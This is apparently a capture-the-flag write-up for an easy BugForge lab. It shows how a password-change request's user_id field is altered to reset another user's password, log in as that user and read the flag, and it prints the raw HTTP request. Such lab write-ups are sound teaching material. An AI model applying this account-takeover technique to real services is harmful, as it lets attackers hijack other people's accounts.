# CopyPasta

Level: Easy\
Points: 10\
Type: Daily Challenge

Lab Interface

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FpDKkcX7ACKqwaWaTIzES%2Fimage.png?alt=media&#x26;token=aa07eb22-e9f3-422a-b128-9bc95ac2b6b4" alt=""><figcaption></figcaption></figure>

Key Feature: We have option to change password.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FCkbTV3QDDzgn6IrZUSnH%2Fimage.png?alt=media&#x26;token=6bfee8dc-7361-42c0-b12e-09dc9860e5ad" alt=""><figcaption></figcaption></figure>

Its respective request is

```
PUT /api/profile/password HTTP/2
Host: lab-1772045117373-w7zhpl.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJzdXNoaWwiLCJpYXQiOjE3NzIwNDUxNjh9.x24WzsblCATJ4Z6ADjqzkB349kp3OiJ6nOODyGS3EuU
Content-Length: 33
Origin: https://lab-1772045117373-w7zhpl.labs-app.bugforge.io
Referer: https://lab-1772045117373-w7zhpl.labs-app.bugforge.io/profile/sushil
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{
    "password":"sushil",
    "user_id":5
}
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FzY2OMmk2pu0zhGeyjISO%2Fimage.png?alt=media&#x26;token=24c782f3-b73c-4928-ad25-b941fe0d209f" alt=""><figcaption></figcaption></figure>

Key thing to look here is `user_id` value. Next step here would be to change `user_id` to differet value hoping we can change password of different user.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FjeGypFzYmhBkj5mhSTeL%2Fimage.png?alt=media&#x26;token=66c67dcc-80f9-45c8-88ed-08403102554a" alt=""><figcaption></figcaption></figure>

Got 200 Ok. Lets verify this by changing the password of different user.\
From `/public` we can find various users's username

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FtpbhRYloT93fes6dB7Rl%2Fimage.png?alt=media&#x26;token=6162e7f6-ccef-437b-ac66-ae745bab97e0" alt=""><figcaption></figcaption></figure>

Getting stats of user `coder123` . `id= 2`

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FACICuqlgNt4PutagJXD8%2Fimage.png?alt=media&#x26;token=973d6a0b-b1cf-4a41-a09d-26fd77edac6d" alt=""><figcaption></figcaption></figure>

Changing password of user 2

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FaDYbq2AZFHxw0XjPMEBb%2Fimage.png?alt=media&#x26;token=5f6b4257-0573-4dc1-935b-20c137469cba" alt=""><figcaption></figcaption></figure>

Successfull login

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2F0PDpadmsN7n4PXo9zm8u%2Fimage.png?alt=media&#x26;token=abd8d129-1be8-496f-b10c-b508343c1718" alt=""><figcaption></figcaption></figure>

Flag on dashboard

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2F3M9ZJiVLSnPTCaS9QsDx%2Fimage.png?alt=media&#x26;token=1d67a5cc-d664-459a-8119-dc59f1c3d89e" alt=""><figcaption></figcaption></figure>